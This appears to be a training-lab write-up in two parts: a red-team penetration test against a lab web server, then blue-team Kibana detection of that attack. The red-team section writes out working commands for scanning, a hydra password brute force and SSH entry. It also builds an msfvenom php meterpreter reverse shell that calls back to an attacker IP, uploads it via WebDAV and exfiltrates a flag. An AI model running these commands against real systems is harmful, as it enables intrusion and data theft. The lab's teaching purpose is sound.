# Red-Team-vs-Blue-Team

**NETWORK TOPOLOGY**

[Topology Diagram](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Network_Topology.png)

**RED TEAM - Penetration Test**

**EXPLOITATION**


**Discover target IP:**

To discover the target ip:

`netdiscover -r <ip subnet>`

For this I used subnet 192.168.1.0/24

[IP addresses found](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_2.png)

| IP | Machine |
| ------ | ------ |
| 192.168.1.1 | Gateway IP |
| 192.168.1.100 | Elk Server |
|   192.168.1.105   | Capstone |

**Ports/Services/Versions scan:**
`nmap -sV -v 192.168.1.105`


| Port | Service | Version |
| ------ | ------ | ------ |
| Port 22 | SSH | OpenSSH 7.6p1 |
| Port 80 | HTTP | Apache httpd 2.4.29 |

[Ports/Services/Versions](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_3.png)

**Aggressive scan:**

`nmap -sV -v 192.168.1.105`

Simple but aggressive scan that reveals the directory of a webserver on tcp port 80 and two potenetial usernames of employees Hannah and Ashton.

[Webserver Files](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_26.png)


**Navigating the Webserver:**

Since this is a webserver, we can investigate from our attacking machine using a browser:

[Webserver](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_4.png)

in "company_blog/" we find a 3rd user, Ryan, who seems to be the CEO. This would possibly give us the highest level of access.

[company_blog](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_27.png)

The "meet_our_team" folder confirms that there are three potential users, and each of their files references the secret_folder:

[meet_our_team](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_5.png)

[Ashton](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_6.png)

As seen below, we need Ashton's password to gain access to the secure secret_folder.

[secret_folder](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_28.png)

**Vulnerability scan:**

`nmap -A --script=vuln -vvv 192.168.1.105`

Returning to scanning for further recon.

Aggressive scan with a vulnerability script reveals:

 - Webdav vulnerability
 - SQL Injection vulnerability across all directories on the webserver
 - CVE-2017-15710 – Apache httpd vulnerability

[Vulnerability](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_24.png)

[Vulnerability](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_25.png)


**Bruteforce:**

Now that we have usernames and a main target, using hydra we can attempt to bruteforce the login for the secret_folder.

Ashton, the CEO, had a common password within our password list. Using the following command, we could get Ashton's password.

`hydra -l ashton -P /opt/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get "/company_folders/secret_folder"`

[Ashton's Password](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_9.png)

The password would later be determined "leopoldo" but would continuously come up as 12345

**SSH:**
`ssh ashton@192.168.1.105`

Using Ashton's credentials we could gain ssh entry into the server.

[SSH into Ashton/ID](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_10.png)

Flag 1

In the root home directory we pickup flag 1.

[Flag 1](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_11.png)

With the same credentials we can access secret_folder

[accessed secret_folder](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_30.png)

Password hash:

In the folder was a document with instructions to connect to a corp_server. Included in the document are Ryan's hashed credentials and reference to a webdav directory

[connect_to_corp_server](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_29.png)

The hashed password was cracked using Crackstation, revealing password "linux4u"

[Cracked Hash](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_31.png)

Webdav:

We then login to webdav using Ryan's credentials.

[Webdav](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_33.png)

**Reverse Shell:**

Msfvenom

The next task was to upload a shell script to webdav, in order to create a reverse shell.

`msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 -f raw -o shell.php`

Using msfvenom we create payload, shell.php

[msfvenom](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_12.png)

Cadaver

`cadaver http://192.168.1.105/webdav`

Using cadaver and Ryan's credentials we accessed webdav, and uploaded the payload to the webdav directory.

[cadaver](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_13.png)

[put shell.php](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_14.png)

Metasploit

`msfconsole
use multi/handler`

Once the payload was successfully uploaded, in order to create the reverse shell, we setup a listener using Metasploit.

[msf multi/handler](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_16.png)

After loading the exploit and then activating shell.php we uploaded by going back to the webserver where it should be located in the Webdav, the target server should now be connected to our listener and launched a meterpreter session into their system.

[Exploit](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_18.png)

Gaining Interactive Shell:

`python -c 'import pty; pty.spawn("/bin/bash")'`

[python script](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_19.png)

**Finding Flag 2:**

The next flag was located in the root directory.

[Flag 2](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_20.png)

Exfiltration:

The file was easily exfiltrated back to the attacker machine.

[Exfiltrating Flag](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_22.png)

**BLUE TEAM**

**Identifying the port scan:**

_Filtering for Nmap:_


[Source/Destination IP's](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_38.png)

[Kibana scan](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_39.png)

_Monitor Requests for "secret_folder"_

[Source/Destination IP + URL path](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_37.png)

[secret_folder Data](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_40.png)

Filtering for the Hydra brute force attack:

[Hydra filter](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_41.png)

[Hydra Hits](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_42.png)

_Finding the WebDAV connection:_

A reverse shell in webdav was used 11 times

[Webdav filter](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_44.png)

[WebDAV hits](https://gitlab.com/grantklitzke1/red-team-vs-blue-team/-/raw/main/images/Screenshot_43.png)
